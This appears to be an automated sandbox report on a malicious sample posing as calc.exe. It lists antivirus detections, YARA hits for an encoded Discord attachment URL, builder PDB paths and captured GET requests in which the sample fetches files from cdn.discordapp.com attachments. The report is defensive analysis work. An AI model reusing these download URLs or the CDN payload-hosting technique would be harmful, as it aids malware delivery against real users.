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Windows Analysis Report calc.exe


General Information

Sample Name:calc.exe
Analysis ID:510683

Most interesting Screenshot:


Range:0 - 100


Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Found detection on Joe Sandbox Cloud Basic with higher score
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
.NET source code contains potential unpacker
AV process strings found (often used to terminate AV products)
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
IP address seen in connection with other malware
Enables debug privileges


Process Tree

  • System is w10x64
  • calc.exe (PID: 2952 cmdline: 'C:\Users\user\Desktop\calc.exe' MD5: CE76AE9D476B9C0DAA25DAF4C6DD4909)
    • conhost.exe (PID: 3100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

calc.exeSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc

Memory Dumps

00000000.00000000.252642988.0000000000322000.00000002.00020000.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x138e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000002.291985012.0000000000322000.00000002.00020000.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x138e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000000.245005606.0000000000322000.00000002.00020000.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x138e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x10440:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
  • 0x10504:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x66a:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
  • 0x736:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
Click to see the 8 entries

Unpacked PEs

0.0.calc.exe.320000.1.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
0.0.calc.exe.320000.0.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
0.0.calc.exe.320000.2.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
0.2.calc.exe.320000.0.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

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Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sampleShow sources
Source: calc.exeAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: calc.exeVirustotal: Detection: 54%Perma Link
Source: calc.exeReversingLabs: Detection: 26%
Machine Learning detection for sampleShow sources
Source: calc.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: -> version: TLS 1.2
Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb& source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb2 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb4 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdbh source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: rasadhlp.pdb~ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbT3Rm source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbHL source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoree.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb:0 source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: kDC:\Users\user\Desktop\calc.pdb source: calc.exe, 00000000.00000000.252775219.00000000006F8000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: winhttp.pdbZ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbMZ@ source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdbd source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbG source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.260565634.0000000002F42000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbV source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb source: calc.exe, 00000000.00000000.254647015.0000000002729000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb* source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: C:\Users\jpint\OneDrive\Desktop\BuilderBot\BuilderBot\bin\Release\stub\un_priv\DarkEdition\obj\Release\calc.pdb source: calc.exe
Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.260585475.0000000002F53000.00000004.00000001.sdmp
Source: Binary string: calc.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbh source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb@ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp


System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Users\user\Desktop\calc.exeDomain query: cdn.discordapp.com
Source: C:\Users\user\Desktop\calc.exeNetwork Connect: 443Jump to behavior
Source: global trafficHTTP traffic detected: GET /attachments/897402450376536075/897465559711633408/8NMrqq.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/897223707649515602/897228595318124554/ascii_ART.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.com
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewIP Address:
Source: Joe Sandbox ViewIP Address:
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 28 Oct 2021 02:56:06 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 6a50e397b8ab1756-FRACache-Control: private, max-age=0Expires: Thu, 28 Oct 2021 02:56:06 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"X-GUploader-UploadID: ADPycdso1L-ylGX3bmenRtNOQmdon87QxmC7cXUyPENI7fDPUtJpk_9x5Bbi4ZgqkkYUdWdLYHwGtl2nhQu3WyOEx-8lP-t6kAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X0aOWmo3%2Bd2J5p5kYEmgATNoxtwSQamhuDwF0HfeVv3A%2FULL0goDlzj8myWfYgoN8Wz%2BTegRCRL%2FE6v2%2BH8q99WsdaRWi95pVvtRlzG%2F%2B%2BEfjTXgU25DZRc%2Botur%2FhsNBmyD9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: calc.exe, 00000000.00000002.293292330.0000000002691000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
Source: WerFault.exe, 00000005.00000003.289499864.0000000004EDB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.d
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.di
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.dis
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.disc
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.disco
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discor
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discord
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discorda
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordap
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.c
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.co
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/a
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/at
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/att
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/atta
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attac
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attach
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachm
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachme
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachmen
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachment
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/8
